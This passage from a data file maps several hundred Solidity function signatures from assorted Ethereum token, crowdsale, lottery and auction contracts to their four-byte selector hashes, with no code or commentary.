"withdrawToPartner(address,uint256)": "0x6c055ce2", "UNIT()": "0x9d8e2177", "QuarterCoin()": "0xc7f132d5", "XPZ()": "0xa621d679", "GGCT()": "0x18fa223a", "completeCrowdSale()": "0x43c35651", "switchCrowdSaleStage()": "0xe8a71012", "ZanCoin()": "0x8f0ec6b3", "CyberVeinToken(address,address,address,uint256)": "0x06c18ae0", "CGTToken()": "0x9f03d82f", "OF()": "0x7c774111", "YESToken()": "0xd1026aa8", "ConsultaRegistro(string)": "0x66ba707f", "GuardaRegistro(string)": "0xe1aa1098", "TrocarAdmin(address)": "0xabf8de6b", "RegistroBlockchain()": "0xd5949bf3", "YSS(uint256,string,string,uint8,address)": "0x58d4e051", "getTradeHash(address,uint256,address,uint256,uint256)": "0xa1490d50", "cancelTrade(address,uint256,address,uint256,uint256)": "0x6280382a", "fillTrade(address,uint256,address,uint256,uint256,uint256,uint8,bytes32,bytes32)": "0xfdd3af8f", "pullFromCirculation(uint8)": "0x2b232741", "mintUnreleasedCard(uint8,address)": "0x6977aa62", "mintPackSaleCard(uint8,address)": "0x7579fcb3", "setPackSaleAddress(address,address)": "0x19ea8a98", "_mintCard(uint8,address)": "0x771cbe3d", "cardAndChecklistIdsForOwner(address)": "0xf7ce25bb", "limitForChecklistId(uint8)": "0x303d0870", "deployStepFour()": "0x4fb34523", "deployStepThree()": "0x234c4bd9", "deployStepTwo()": "0xda75b901", "deployStepOne()": "0x26965dad", "unreleasedCount()": "0x59c42f75", "iconicsCount()": "0x839dbbb1", "originalsCount()": "0xc1d4bc64", "addPlayer(string)": "0xf77e8b83", "createMarriage()": "0xbcb83450", "setHoldMax(uint256)": "0x6d278b29", "setHoldTime(uint256)": "0xf9455301", "hold(address,uint256)": "0x977a5ec5", "holdedOf(address)": "0xe2a3382f", "initializeRefund()": "0x49dbdf30", "tokensWithdrawal(address,uint256)": "0x04ce1a61", "VesaStage2PreICO()": "0xae51db0d", "DGD()": "0x14b7c684", "BrainIsToken()": "0x745ab73d", "KarmaToken(uint256,string,uint8,string)": "0x63228b57", "TOSToken()": "0x758866f0", "addDocument(bytes32,string,string,uint256,uint256)": "0xdc441754", "TrustedDocument()": "0x73f69bc5", "EquinoxCoin()": "0xd91ca13e", "change_admin_commission(uint256)": "0x5bea641a", "deactivate_admin_comission()": "0x88c8da99", "activate_admin_commission()": "0xe35501be", "DACVest()": "0xef99c9ef", "StandardGasPriceLimit(uint256)": "0xd45b1ae4", "TruckingCoin()": "0xc5b7be81", "CCH_MENA_1()": "0x5365ccf7", "burnByAmount(uint256)": "0x6cffd817", "burnByPercentage(uint8,uint8)": "0x776f3b99", "chargeTokensForManagement()": "0xb8e44852", "allocateTokens()": "0x03894922", "calculateTransferFee(uint256)": "0x37800bde", "FeeCalculation()": "0x86f35b7c", "setDistributionPercentage(uint256,uint256,uint256)": "0xd340e8f8", "setManagementFeeChargePercentage(uint256,uint256)": "0x500c6f21", "setInterestAllocationPercentage(uint256,uint256)": "0x9d9aeb7f", "setTokenTransferPercentage(uint256,uint256)": "0x2f0b5cb5", "Distributed()": "0xb8b570f1", "removeFromTransactionDisallowedList(address)": "0x54091a20", "addToTransactionDisallowedList(address)": "0x36c5ff5d", "setIsTokenTransactionOpen(bool)": "0x101a3fec", "TokenTransaction()": "0xb21800d0", "removeFromTokenTransferDisallowedAddresses(address)": "0xd38c4cca", "addToTokenTransferDisallowedList(address)": "0x12724689", "setIsTokenTransferOpen(bool)": "0xb1f2e537", "setIsChargingManagementFee(bool)": "0xe5f59e7c", "setIsAllocatingInterest(bool)": "0x353f1bc7", "setIsChargingTokenTransferFee(bool)": "0xf29c1bc2", "Restricted()": "0xccc08913", "scanAddresses(address)": "0x71e5b9ec", "TokenHeld()": "0x894fefeb", "getIndexOfTarget(address[],address)": "0xb3ea5984", "Common()": "0x323c59c4", "DisqusBot()": "0x9befa8b4", "balanceTransferred(address,uint256,bytes)": "0x2ce82189", "transferAndCallback(address,uint256,bytes)": "0x773d33f5", "buyVotes(uint8)": "0x2f274d91", "MarketJob(address[],uint256[],uint256[],address,address,bytes)": "0x9cc579af", "unlock(string)": "0xa96ce7aa", "lock(string)": "0x320a98fd", "initLock()": "0xe38f4861", "addclip(address)": "0x3fec0561", "blocktube(uint256,string,uint8,string)": "0x82c8c76f", "confirmOwnership()": "0xd5d1e770", "WithdrawEth(uint256)": "0xb2a3fd05", "calculateSaleAmount(uint256,uint256)": "0x83e8dbb8", "toUnixtime(bytes32)": "0xbcf599f1", "b32toHexString(bytes32)": "0x8ad46ba0", "b32toString(bytes32)": "0x5c8a733a", "getApproveValueFor(address)": "0x6bbea781", "setAllowanceValue(uint256)": "0xf436de14", "getAllowanceSpenderValue()": "0x890e9d2f", "getAllowanceOwnerValue()": "0x11dc6816", "getApproveValueValue()": "0x8e207fa0", "getApproveSpenderValue()": "0xe4b6fbe2", "getTransferFromValueValue()": "0x6be6fa14", "getTransferFromToValue()": "0x4985acee", "getTransferFromFromValue()": "0x50f0f83d", "_setGasPrice(uint256)": "0xbbb655b6", "_ensureNewUser()": "0xfdbc368a", "_isNewUser()": "0x72a66507", "getVote(address,address,uint32)": "0x48e591ac", "getSolution(address,uint32)": "0xceb0884d", "getDictJob(address,uint32)": "0x23c99826", "checkPayout(address,uint32)": "0x58a0bcdd", "solUpDownVote(bool,uint32,address)": "0x93830c74", "addSolution(bytes32,address,uint32)": "0xcd277e6c", "createJob(bytes32,uint256)": "0x8801c928", "Log2(string,uint256,uint256)": "0xa00c0a28", "Log1(string,uint256)": "0x44ca361f", "Log0(string)": "0x8814fa3f", "hashAddress(address)": "0x3aa5fe59", "owners(address)": "0x022914a7", "moduleMultiOwner(address)": "0x6f2594a0", "getLastMaxInvestments()": "0x67b26cab", "getTotalInvested()": "0x5f945733", "getMinFunds()": "0x7ae9c430", "recordInvestment(address,uint256,uint256)": "0xe16fb2f9", "calcSTQAmount(uint256,uint256)": "0x037933dd", "onFailure()": "0xdaa7370f", "onSuccess()": "0x9f75ccc8", "finishICO()": "0xc4561d61", "distributeBonuses(uint256)": "0x0d80fcdb", "setFundsRegistry(address)": "0xc667ab20", "STQCrowdsale(address[],address,address,address)": "0x63d292d7", "incByTwo()": "0xf93f1b02", "incBy(uint256)": "0x70119d06", "_getTokenAmount(uint256)": "0x7a99bb0a", "_postValidatePurchase(address,uint256)": "0xc79f7cef", "dropRoute(uint32)": "0xd1f61ed5", "AirTrafficControllerROS(address,int256,address)": "0x8e357b6f", "newRequest(address)": "0x2e8e66b9", "getDepositAddressVerify()": "0x73ae277b", "voteProposal(uint256)": "0x807896d5", "createProposal(address,bool)": "0xaf45118e", "nonHighestBidderRefund()": "0x6bd61a66", "bidderPlaceBid()": "0x7f0a1bed", "bidderUpdateBid()": "0xa8567a1c", "getBid(address,address)": "0xa68c9bbb", "BetterAuction(address,address,address,uint256,uint256)": "0xeb2bef47", "STQPreICO(address,address)": "0x1cdc3f8a", "addArrayItem(address,string,string,uint256)": "0x47be11ae", "addArrayItem(address,string,string,address)": "0x9b09dfbd", "getConfig(address,string)": "0xaced5935", "subApproval(address,uint256)": "0xe2301d02", "addApproval(address,uint256)": "0xac3cb72c", "attemptPublishOfArticle(uint256)": "0x3475c1e7", "submitReview(uint256,bool)": "0xc11741a9", "applyToBeAReviewer()": "0x596f3473", "submitArticle(string,string,bool)": "0xab929fcd", "simpleSubmit(uint256)": "0xdc8d1095", "changeReviewRules(uint256)": "0x6dc37dee", "Journal(uint256)": "0x64c7b3bf", "isVersionContractOrLogic()": "0xbeff90dc", "isVersionLogic()": "0x54a6ff68", "isVersionContract()": "0x360aa28b", "getContractName()": "0xf5f5ba72", "getCns()": "0xf9b2b19a", "calculatePayout(bytes32,uint256)": "0xe2b863cf", "unpaidPercentage(bytes32)": "0x62afd64a", "setUnpaidPercentage(bytes32,uint8)": "0x9233d561", "setHourlyRate(uint256)": "0xc17c3521", "SpiceRates(address,uint256)": "0x5f9aa94f", "blocktubeCoin(uint256,string,uint8,uint256,string,string)": "0xca66a9c7", "Identity(bytes32,bytes32)": "0x8c87b2fc", "emitErrorCode(uint256)": "0x8834277e", "_emitErrorCode(uint256)": "0x3938faa1", "_emitError(bytes32)": "0x4fd4dbaa", "_setEventsHistory(address)": "0x41760afc", "getEventsHistory()": "0xfff10aba", "Prover()": "0x1e5f35f3", "getMaxAmount(address)": "0x15525991", "getMinAmount(address)": "0x5eb62178", "getMaxAmount()": "0x0ba95909", "getMinAmount()": "0xcfc7e2da", "getFeePercent()": "0xbe74264d", "getFeeRecipient(address)": "0x5d9c4f0f", "gcpm(uint256)": "0x78e8cab5", "gcpn(uint256)": "0xb521d3bb", "gcsc(uint256)": "0x40e50d00", "guhb(address)": "0x4080277f", "ggcd(address)": "0x294bbc09", "ggc(address)": "0x9196bdd5", "cg(address,uint256,uint256,uint256)": "0xcbad7bf6", "cmpn(uint256,uint256)": "0xbd61ff75", "gcmp(uint256,uint256)": "0xf64cd26b", "gur(address,address)": "0x8e8e4675", "cpn(uint256)": "0xe731bb09", "gcp(uint256)": "0xa6e4ae01", "gco(uint256,address)": "0xb9174330", "sco(uint256,address,uint256)": "0xc003f540", "ico(uint256,address,uint256)": "0x977567a4", "rb(address)": "0x91c3e5ee", "ap(address)": "0xb0575069", "icoStarted()": "0x0b5e89f4", "Sarf()": "0xb4de64bd", "LifePasswordAI()": "0xf94f1e9a", "socibit()": "0xdaad98f4", "CpublicGold()": "0xfc0262e0", "killDividentContract(uint256)": "0xdaa69c9e", "_saleTokens()": "0xba0fbf0d", "setProfitAddress(address)": "0x82cf114c", "setHardCapDividends(uint256)": "0x37e94529", "setHardCapCrowdSale(uint256)": "0x839b240e", "setNewDividendContract(address)": "0x83f13e7f", "killContract(address)": "0xbcea363d", "_CalcDiv()": "0xfc3daf81", "ReturnToken(uint256)": "0x05777d9b", "getInvestorAddress(uint256)": "0x0185f409", "setTokenBuyRate(uint256)": "0x2910a32b", "QYTestingToken()": "0x2887cecd", "TimeBankChain()": "0xe53b373e", "VeChainX()": "0x433914c9", "completeReleaseAuction(uint256)": "0x53297b71", "getAllTokens(address)": "0x178b6de6", "getRemainingTime(uint256)": "0x181e0124", "getAdditionalTime(uint256)": "0x54e2dc8d", "getHighestBidder(uint256)": "0xc750cb79", "releaseAuctionEnded(uint256)": "0x5d468d38", "getReleaseAuctionEndTime(uint256)": "0x9fe634b9", "isReleased(uint256)": "0x73962b26", "getEditionReleaseTime(uint256)": "0x9e282328", "getCurrentEdition()": "0x55de5a93", "setDatabaseDownloadUrl(string)": "0xd3a61150", "owned(uint256)": "0x8acb99ac", "withdrawOwner2(uint256)": "0xbf32a4b6", "gotake()": "0xd5f24708", "findNewExchangeContract()": "0x52d005d6", "depositEtherForUser(address)": "0x65d9d8e2", "updateMasks(uint256,uint256,uint256)": "0x6b199471", "updateGenVault(uint256)": "0x259852f8", "calcKeysReceived(uint256)": "0x409dba83", "calcUnMaskedEarnings(uint256)": "0xdd1dbc3a", "getPlayerVaultsHelper(uint256)": "0x08e2287c", "reLoadXname(bytes32,uint256)": "0xfb9073eb", "reLoadXaddr(address,uint256)": "0x015008b1", "reLoadXid(uint256,uint256)": "0x8f8a5832", "buyXname(bytes32)": "0x438d359e", "buyXaddr(address)": "0xaeeed0db", "buyXid(uint256)": "0xcd133c8f", "IG()": "0xd3d8aa55", "DumpDivs()": "0x6f00a3cf", "getBonusCount()": "0x76d8f03e", "setBonusThresholds(uint256[],uint256[])": "0xacc93c9e", "setLockToAccount(address,address)": "0x014fc169", "toggleLocked()": "0x01b11792", "initialize(address,address,uint256)": "0x1794bb3c", "eosGAS()": "0xdbdb8b56", "IndexCoin()": "0xb2e3d212", "ValueTokenBase(uint256,string,string,uint8)": "0x5a625393", "PityToken()": "0x40c0c5ff", "fondToken()": "0x0ba27775", "SaraAndMauroToken()": "0x6f8c3e4c", "Boardcoin()": "0x0a323fd0", "increase(uint256)": "0x30f3f0db", "SinoeCoin()": "0xe5b2a58d", "delKycVerifiedInvestor(address)": "0xf22b683e", "addKycVerifiedInvestor(address)": "0x7dabb4d6", "delBackend(address)": "0x99b22701", "addBackend(address)": "0x2ac016ad", "computeBonuses(uint256)": "0xe6f02bf9", "buyTokensViaBackend(address,uint256)": "0xa3fc81cb", "getUsdCentsFromWei(uint256)": "0x0c7e30b7", "UpdatePay()": "0x75b9c384", "Lilbank()": "0x0df62a33", "calcVesting(address)": "0x7642dc0f", "offchainUpload(address[],uint256[])": "0xad5c1687", "setTransferRight(address[],address[])": "0x6b84dfcd", "setKYC(address[],address[])": "0x38241c16", "claimVesting()": "0xfedda89c", "setVesting(address,uint256,uint256,uint256)": "0xc0ab5704", "changeSetRateAddress(address)": "0x9d3cc187", "changeKYCAddress(address)": "0xb19f30e2", "changeOffchainUploaderAddress(address)": "0x4774027c", "bulkTransfer(address,address[],uint256[])": "0xe886dade", "deposit4(address,address)": "0x939090f8", "deposit3(address,address)": "0x98ff116d", "getHash1(address,uint256,address,uint256,uint256,uint256)": "0xc5bef74e", "checkHash(address,uint256,address,uint256,uint256,uint256)": "0xdfe1f357", "getHash(address,uint256,address,uint256,uint256,uint256)": "0x050e25a0", "getSender(address,uint256,address,uint256,uint256,uint256)": "0xc1c11c96", "init(address,uint256,bytes32,uint256,uint256,uint256,uint256,bool,bool,address)": "0xf6ecd724", "OwnerOf(uint256)": "0xcf9b62d9", "GetLandId(uint256)": "0x441ea478", "GetCityLandNums()": "0xf2659bd1", "IsReady()": "0xf4b95676", "TriggerCooldown()": "0xdc6f39a3", "GetBetBalance()": "0x6e88274b", "GetBetReadyTime()": "0x3552f9f6", "GetBetGamblers(uint256)": "0x338ef191", "GetBetNums(uint256)": "0xa79dad23", "GetTotalGamblerNum()": "0x8aceaa4a", "GetGamblerChoices(address)": "0x9c9fb68b", "GetLuckyRewards()": "0xc68a536d", "GetLuckyGamblers(uint256)": "0x6714cfe2", "GetLuckyLandIds()": "0xefc3d252", "GetBetResult()": "0x3a6ffc92", "GetLandId(uint256,uint256)": "0x0ac8dc61", "GetBetId(uint256,uint256)": "0xeef7dd0a", "MakeBet(address,uint256)": "0x21542702", "InitBetContract(address,address,uint256)": "0xb000c81b", "setCityContract(address)": "0xabdd19d9", "mitfwdToken()": "0x5429d4b5", "setLocked(address)": "0x9192f48e", "settle(address)": "0x6a256b29", "GBCCoin()": "0x10458684", "checkValidTk(address)": "0x7a2b9116", "getTotalValidTk()": "0x3f02e4f0", "gettotalReceivedTicket()": "0xaa53d7d4", "checkReceive(address)": "0xb8163641", "getstopBlockNumber()": "0x20aac36f", "getstartBlockNumber()": "0x6ad34dab", "getWinnerByDrawBlockNumber(uint256)": "0xe9d5d43b", "getAllWinner()": "0x3623f548", "getDrawBlockNumberByWinner(address)": "0xadb5777c", "getLastDrawBlockNumber()": "0xee9a8489", "pausePresale(bool)": "0xd7299ef7", "getLastSeed()": "0xdbca1207", "setCrowdSaleAddress(address)": "0x8f456125", "getSeedByWinner(address)": "0x49c91267", "reset(address[])": "0xb916de59", "setUsdEthValue(uint256)": "0x1f3ee21f", "receiveTicket(address)": "0xcceb6368", "getUSDPrice()": "0xc338287f", "startReceiveTicket()": "0x6eef908f", "executeSell(address,uint256,uint256)": "0x3ec3aedc", "stopReceiveTicket()": "0x2fda7166", "prepareSell(address,uint256)": "0x8c4e9c50", "generateRand()": "0xd9b596c7", "newInvestment(address,uint256)": "0x1e02f805", "crowdSaleCheck()": "0x36da1471", "ZHORA()": "0xbd24b0d0", "deletThisContract()": "0xa58ff4fc", "returnTokenToWallet()": "0x520e8143", "startstopICO(bool)": "0xe1df7f60", "setlockall(bool)": "0x9a4363cb", "setlockaddress(address,bool)": "0x2630271d", "YDHTOKEN(string,string,uint256)": "0xed83e9aa", "PublisherAddress()": "0xef943909", "transferPublisher(address)": "0xa5c8b7a1", "NExT()": "0x1f974fe4", "removePersonalTokenLock(address)": "0x130a39b1", "removeTokenLock()": "0x69712ffa", "isTokenLock(address,address)": "0x43e204b3", "bohwa()": "0x81758fb4", "PrometheusX(address,address)": "0x10f2e11c", "xpectoTTF1Token()": "0x8cef1ed9", "freezeAll(bool)": "0x3f686170", "OwnerAddress()": "0x7f17b05d", "constructors()": "0x25b886eb", "Ynfiniti()": "0x01778b6d", "sellDentacoinsAgainstEther(uint256)": "0x84c14b25", "buyDentacoinsAgainstEther()": "0x02500824", "setDCNForGas(uint256)": "0x3fdccd8d", "setGasForDCN(uint256)": "0x5ff4ae32", "DentacoinToken()": "0x6e6f2fe5", "forx()": "0x2a4e4a84", "transferAllBalance(address)": "0x51c54ec6", "getEventInfo(uint256)": "0x1d645b12", "getBadgeInfo(uint256)": "0xe2045b5e", "getBadgeByKtUserId(uint256)": "0xae5c75aa", "addBadge(uint24,int16,int16,uint24,uint256,string,string,string,uint256)": "0xa20bbb8b", "batatacoin()": "0xe844cb18", "OGPToken()": "0x6ab03a7f", "NodeMCU_Endpoint()": "0x6070f1be", "WojakCoin()": "0xa791c665", "ETHBITA()": "0x4a1c6549", "get_rest(uint256)": "0x71c03d76", "fix_amount(uint256)": "0x8f87932c", "current_mul()": "0x57e5be05", "redenominate()": "0xc091e45a", "is_banned(address)": "0xb3adc716", "unban_user(address)": "0xa7e1b516", "ban_user(address)": "0x0fccf22e", "bitmask_check(address,uint256)": "0x9cba60a7", "bitmask_rm(address,uint256)": "0x1a327d97", "bitmask_add(address,uint256)": "0xf03a6872", "pubaddr()": "0x1c6416ad", "getListAddressHolders()": "0x07eb752e", "vestInterval()": "0xf2f3c773", "yaaay()": "0x99e7c00a", "icoRatio()": "0xb3b8c620", "lowTimeBonusValue()": "0xe20bce0a", "fundRaiser()": "0xff2073d7", "getNowVestingType()": "0x1861cb28", "totalRewardsDistributed()": "0xee172546", "teamTokensCurrent()": "0xe001ddf1", "frozenDaysforTestExchange()": "0x3fb51a76", "MiningWarContract()": "0xca2cef51", "FEE_DENOMINATOR()": "0xd73792a9", "previousDungeonId()": "0x040177b7", "UNLOCKED_TIME()": "0xb7930507", "COMPANY_TOKENS_PERCENT()": "0xd79d5c7a", "preIcoCashedOut()": "0x53c9843f", "transferIsEnabled()": "0x2282d9f2", "originalToken()": "0x0e7c1cb5", "starbaseMarketingCampaign()": "0x3774e6f5", "isConfirmed()": "0xa79a3cee", "FirstEtherLimit()": "0x36067543", "PreviousPayout()": "0xf35898bd", "overdraftPeriodAmount()": "0x8c3c00aa", "rafflepot()": "0x6eff96f2", "startMilestone()": "0x039efdeb", "P3DAddress()": "0xc4432f31", "QbaseIssued()": "0x595a7273", "isIcoStage()": "0x1bb797da", "SolidStampRegisterAddress()": "0x2ed5016a", "targetDiscountValue4()": "0xc45ddd87", "rewardOne()": "0x0596334f", "GAS_LIMIT()": "0x091d2788", "depositForDividends()": "0x1ff5668c", "execCUSEOption()": "0x26d3bde5", "transferFeeOwner()": "0x4921cea6", "bonusInPreSalePhase1()": "0xa19e1d00", "writerAccountSupplyRemaining()": "0x06993c97", "getRateByTime()": "0x41533ba7", "testTokenA()": "0xa96fb9b4", "advisoryWallet()": "0xdc493790", "donated()": "0x639bbb37", "preSaleBonus()": "0xab51b06f", "SALE()": "0x4db08aea", "cliffPeriod()": "0x2f661946", "bonus1StartETH()": "0xa852995d", "changeInsurerOperation()": "0x8ab8342e", "startStage3()": "0x877d481c", "secondChainHNw2()": "0x6f3b2819", "time_of_token_swap_end()": "0xceb6dbc3", "tokenClaimWaitingPeriod()": "0xd871e94b", "communityTokens()": "0x2e5fe746", "waitQuery()": "0xa846fa37", "updateContract()": "0xa241c089", "ICOBonusPercent2week()": "0x1df13f28", "paymentqueue()": "0x7a5c8432", "whom()": "0xc5c0db08", "TOKENADDRESS()": "0x516f8986", "zenOSCrowdsale()": "0xf0c71318", "liquidityPoolTotal()": "0x3c920d0d", "presaleClosedManually()": "0x219285d2", "crowdfundStartDate()": "0x55bf5656", "playerBook()": "0x2fa241fc", "proofOfShit()": "0x17462891", "presaleTokensDistributed()": "0x9fb65968", "paymentMax()": "0x6a4509f0", "contributors_count()": "0xbbb28a65", "maxCapEur()": "0xc3dd2395", "TOKENS_FOR_PRESALE()": "0x78a2e101", "dayPotLeader()": "0x12360151", "_price_tokn_ICO1()": "0x951d0332", "secondStageRefund()": "0x7974fdbd", "BONUS_DURATION_3()": "0x2021dfcb", "window0EndTime()": "0xe8e03280", "SPECIALIST_THREE()": "0x32d17917", "devPercent()": "0xfc3c28af", "saleStartAtBlock()": "0xf764531d", "TeamMembersAddress()": "0x15a51595", "lockTokensAddress()": "0x10a82579", "confirmreward()": "0x5b87a2f2", "maxICOSupply()": "0xb16d8622", "managerETHbonus()": "0x0965be64", "devVUPDestination()": "0xba7da724", "maxIssuingSupply()": "0xe36f3177", "preICODataInitialized()": "0xff9c1c5c", "CNDTPrivate()": "0x0cddb437", "bnt()": "0x40ab7b8c", "accessoryDataContract()": "0xb283f2f1", "payoutThreshold()": "0x6b5e1a18", "getLastBidAmount()": "0xa283c9c5", "tradingFee()": "0x56f43352", "contractPoweredUp()": "0xbb6d8c77", "mainSaleRateP4()": "0xf86abfd9", "AgreementUrlRu()": "0x6e843a74", "miningTimePerTrip()": "0x35a23659", "Tokens_Per_Dollar_Numerator()": "0x5267e681", "endDatetime()": "0xd781be46", "picosPerEther()": "0x2d278e9e", "timelockContractAddress()": "0x7fc88fe2", "DAYS_28()": "0x71215af6", "rewardWallet()": "0xfb75b2c7", "UniCoinSize()": "0x2a55cab6", "referralCut()": "0xa91abdcb", "titsTokenAuthor()": "0x9262bba9", "priceOfTicket()": "0x00a70e03", "wingsWallet()": "0xb2c60132", "PriceWeekTwo()": "0x83100580", "charityPayed()": "0x75f2e45d", "bonusRemaining()": "0x982a96e3", "closingTimePeriodOne()": "0x4f85769a", "MAXIMUM_FIRST_DAY_CONTRIBUTION()": "0x3deaf6d4", "withdrawnReadable()": "0x36af1954", "_totalTokenSold()": "0x3f80db69", "icoTokens()": "0xfa4feb65", "_kittenOwner()": "0x65e14731", "meh()": "0xd8ec55ed", "transferToOwner()": "0x2d90ae94", "SwapManager()": "0x381501e6", "OfferContract()": "0xce5fd7f3", "DevPromotionsMarketingWallet()": "0x5709d7bd", "isNewToken()": "0x7b25de45", "lastInvestmentTime()": "0x49361cfe", "RESERVE_TOKENS_SUPPLY()": "0xd4b572be", "isLSNFT()": "0x6a8d7eb3", "sellValue()": "0x2a9043e4", "minEthPerNotification()": "0x50f96b5d", "MAX_TOTAL_TOKEN_SUPPLY()": "0x282c3cf7", "WIN_CUTOFF()": "0x7438b0df", "currentFiscalYear()": "0xffa309e4", "contractValue()": "0xe0dec0c0", "tradeABIHash()": "0x8e1e2add", "tokensAvailableAtCurrentTier()": "0x73f5f8ee", "closeCrowdfund()": "0x75c26c3f", "isAllocatedICO()": "0x31159923", "presalePaused()": "0xa79fdbb4", "startPhaseLength()": "0xaee7052e", "forceOffsetExecuteMaxFee()": "0x9773489a", "TERMS_AND_CONDITIONS()": "0x00094161", "bids()": "0xcc996d1b", "withdrawAdvisorTokens()": "0xa7aac32d", "budgetWallet()": "0x5a02dcde", "tokenToContributor()": "0x6269ae48", "callthis()": "0xac8388a5", "is_verified()": "0xc659dceb", "isVoteOngoing()": "0xf247016c", "endTimePreICO()": "0x46b1d3be", "getRequiredStateChanges()": "0x88db84bc", "refundOn()": "0x562605f1", "stopSetup()": "0x542aa99f", "ICO_CAP1()": "0x264d26e1", "cooWallet()": "0x9216728a", "numberOfInvestments()": "0x74759f43", "centsPerToken()": "0x8f3b6b84", "Fund_Contract()": "0xd71186b9", "hundredtimes()": "0x3264a844", "tokenClose()": "0xb3a844ae", "ICO_BONUS1_SLGN_LESS()": "0x1f3fe8d1", "ItdFund()": "0xa46c8fee", "finishAirdropBy0Eth()": "0xc889e0de", "retreive()": "0xb05784b8", "roundPrice()": "0x296cc401", "onoff()": "0x6850fa6d", "BP_PERSIAN()": "0xd209a566", "beginTime_()": "0x811fe466", "crowdsaleCompleted()": "0x1088f03f", "MenoroCashSupply()": "0x2349748d", "messiDev()": "0x1fab0265", "numBrews()": "0x91e3387b", "paramsValid()": "0x307a1f46", "BAT()": "0x5b7ab891", "preicoAndAdvisors()": "0x8883478e", "OwnerO()": "0x6de6220b", "team1()": "0x8c8d2ede", "LEVEL_MAX_VALUE()": "0x326a7d77", "queenPrestige()": "0xfd6887af", "bribedCitizen()": "0x9c8a5a56", "teamVesting2Years()": "0x9b347f42", "currentCapTokens()": "0x9a165f6c", "MANAGE_CAP()": "0x40d40a72", "smartContactForSale()": "0x26348325", "cvcOwner()": "0xa8a01c3e", "ICOActive()": "0xf098efb3", "SERVER_TIMEOUT()": "0xc1e31eab", "maxTxGas()": "0x01c64ce8", "canSwap()": "0x10ce0516", "accCompany()": "0xa9f036dc", "currentDividend()": "0x23c69d2a", "tokenSaleIsPaused()": "0x0f6b6756", "WEI_MINIMUM_PURCHASE()": "0x2ad45312", "RamenContract()": "0xa4e01230", "TEC_TEAM_WALLET()": "0x60155673", "curRefNumber()": "0xb1d1a159", "supplylimit()": "0xe4eba2ef", "VALUE_DISTRIBUTION_KEY_OWNERS()": "0x1dc17cce", "pivx()": "0x0ab84ed9", "SOFT_CAP_IN_TOKEN()": "0x1d523107", "tokenTransferProxyContract()": "0x9a48eb3e", "totalSaleSupplyCap()": "0xba2318ca", "newClaimer()": "0xd92fb5e9", "maxGoalInICO()": "0xca0c601c", "update()": "0xa2e62045", "PriceTicker()": "0xdeb6930c", "etherSold()": "0x2da0d1ea", "bidCount()": "0xb40a5627", "sendFees(address)": "0x5d068051", "setNextFeePercentage(uint8)": "0x7a791524", "nextEtherForSale()": "0xf2b26d8f", "nextAuction(uint256)": "0xe6690fb1", "createAuction(uint256)": "0xd5563f31", "AuctionMaster()": "0x90c3a370", "placeBid(address,uint256)": "0xd98b9bb5", "payout()": "0x63bd1d4a", "latestBid()": "0x5dd672ec", "hasEnded()": "0xecb70fb7", "hasStarted()": "0x44691f7e", "secondsUntilEnd()": "0xe6d9bb0f", "endTime()": "0x3197cbb6", "startTime()": "0x78e97925", "etherForSale()": "0xfe777bcd", "Auction()": "0x5fb3e119", "assertFact(uint256,string)": "0xfe05e8b1", "removeTrustedIssuer(address,string)": "0xf24b5779", "addTrustedIssuer(address,string)": "0xd8c90762", "setTestString(string)": "0x315e2f1b", "Contract()": "0x5af77fff", "setHouseFee(uint256)": "0x5a09f2f4", "setLotteryFee(uint256)": "0x4a67fa7d", "updateRightLottery(address)": "0xb2353d69", "updateLeftLottery(address)": "0x1e2ca0f3", "totalWinners()": "0xbcc941b6", "remaining()": "0x55234ec0", "elapsed()": "0x2f29d8c5", "baseData()": "0x3b355af6", "allData()": "0xb974b0a3", "finance()": "0x313b7b19", "buyTicket(address)": "0xa5f8cdbb", "LastIsMe(uint256,uint256)": "0x1043dcdf", "changeContractOwner(address)": "0x3ead67b5", "KittenRegistry()": "0x4c4766e8", "assertFact(uint256,bytes)": "0xd3437fe0", "removeTrustedIssuer(address,bytes)": "0x249b4d0b", "addTrustedIssuer(address,bytes)": "0x6ec3af26", "outstandingBalance()": "0x3133f2a7", "awaitingParticipants()": "0x64d905c0", "totalParticipants()": "0xa26dbf26", "NanoPyramid()": "0x420a8ac8", "getPart(bytes,uint256)": "0x501e8428", "CloseContract()": "0x2675c123", "GetFee()": "0x48d9614d", "buyTicket(uint256)": "0x67dd74ca", "addParticipant(address,address)": "0xd35ada32", "Etheramid()": "0xd8e5ae6a", "getSaleDate(bytes)": "0x2a64fb63", "mintToken(int256,address,uint256)": "0x1b5ee6ae", "MyToken(uint256,string,uint8,string,address)": "0x6a0e605f", "winner(address)": "0x2ad95786", "draw(uint256,uint256)": "0xd2b8035a", "setHand(uint256)": "0x00c721ab", "Scissors()": "0x25ea269e", "Paper()": "0xaf769eff", "Rock()": "0x60689557", "updateSettings(uint256,uint256,uint256,uint256,uint256,bool)": "0x1da0fb1b", "DynamicPyramid()": "0x67f809e9", "skipInLine(uint256,uint256)": "0x99c724ef", "play()": "0x93e84cd9", "lineOfPlayers(uint256)": "0xb95594e5", "entryPayoutDue(uint256)": "0xfd35e71b", "entryPayout(uint256)": "0x030d406b", "waitingForPayout()": "0xe46164c5", "playerByAddress(address)": "0xc8e4acef", "totals()": "0xc038a38e", "ShinySquirrels()": "0xe0429b6c", "Token(uint256,string,uint8,string)": "0x244c23ee", "sortWinningNumbers(uint8[5])": "0xe3da41b5", "GetPart(bytes,uint256)": "0x090637a1", "GetNumbersFromHash(bytes)": "0x05433a26", "CheckNumbers(uint8[5])": "0x7154ae61", "ConvertNumbers(bytes)": "0xd1d1c8ae", "CreateNewDraw(uint256)": "0xcc131be1", "OwnerAddFunds()": "0x3211bb90", "StartDraw()": "0x9d3e069c", "ProcessDraw()": "0x3fbd40fd", "AddTicket(bytes)": "0xd7e11e9d", "GetPrize(uint256)": "0xe56b9dce", "cEthereumlotteryNet()": "0x83b23b40", "CheckPrize(address,uint256)": "0x9bb5239a", "CheckTickets(address,uint256,uint256)": "0x86e4e178", "DrawDetails(uint256)": "0x068c966b", "GameDetails(uint256)": "0x269975d0", "ContractStatus()": "0xdd36e18b", "Last_block_number_and_blockhash_used()": "0x43e332c5", "comparisonchr(string)": "0x00873367", "Set_your_game_number(string)": "0x421aeda6", "Ethereum_twelve_bagger()": "0xb6509c12", "collectFees()": "0xc8796572", "enter()": "0xe97dcb62", "x2()": "0x4ff13571", "redeem()": "0xbe040fb0", "safeSubtract(uint256,uint256)": "0xd30fbd0d", "approveAndCall(address,uint256)": "0x3177029f", "UbiatarPlayVault(address,address,uint256)": "0x35f80a1b", "Reservation(address,address[])": "0xdf8dc370", "CrowdsaleBase(uint256,uint256,uint256,address,address[])": "0x4320ea1c", 